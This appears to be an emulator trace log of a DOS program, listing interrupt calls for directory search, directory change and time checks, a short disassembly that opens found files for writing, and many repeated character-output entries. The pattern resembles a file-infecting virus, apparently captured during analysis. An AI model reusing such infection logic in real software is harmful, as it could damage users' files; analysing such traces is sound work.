2018-12-25T12:28:47.237810533Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.240500338Z 59 PC: 12aa6 | Change current directory
2018-12-25T12:28:47.244254872Z 44 PC: 12af0 | Get time 0x12af0: cmp dh, 0xa
0x12af3: ja 0x12afb
0x12af5: mov bx, 0x2ae
0x12af8: call 0x22acd
0x12afb: int 0x20
0x12afd: mov bx, 0x80
0x12b00: mov ax, word ptr [bx + 0x15]
0x12b03: mov word ptr [0x2db], ax
0x12b06: mov ax, word ptr [bx + 0x16]
0x12b09: mov word ptr [0x2dd], ax
0x12b0c: mov ax, word ptr [bx + 0x18]
0x12b0f: mov word ptr [0x2df], ax
0x12b12: mov ax, word ptr [bx + 0x1a]
0x12b15: mov word ptr [0x2e1], ax
0x12b18: mov al, 2
0x12b1a: mov ah, 0x3d
0x12b1c: int 0x21
0x12b1e: mov word ptr [0x2e3], ax
0x12b21: mov bx, word ptr [0x2e3]
0x12b25: mov ah, 0x3e
2018-12-25T12:28:47.246193747Z 2 PC: 12adb | Character output (Char = '0d')
2018-12-25T12:28:47.24837525Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.251732639Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.253503625Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.25577878Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.257666287Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.259478698Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.26183577Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.263820565Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.265613059Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.26780107Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.269742492Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.271596432Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.274591654Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.276843804Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.279813667Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.283146396Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.285463559Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.28772534Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.290528445Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.292855172Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.295123944Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.298128397Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.300218435Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.302489174Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.305491113Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.307795051Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.309870041Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.313620652Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.315676455Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.317611009Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.320134155Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.322084576Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.324048787Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.32637993Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.329702782Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.331344933Z 2 PC: 12adb | Character output (See above)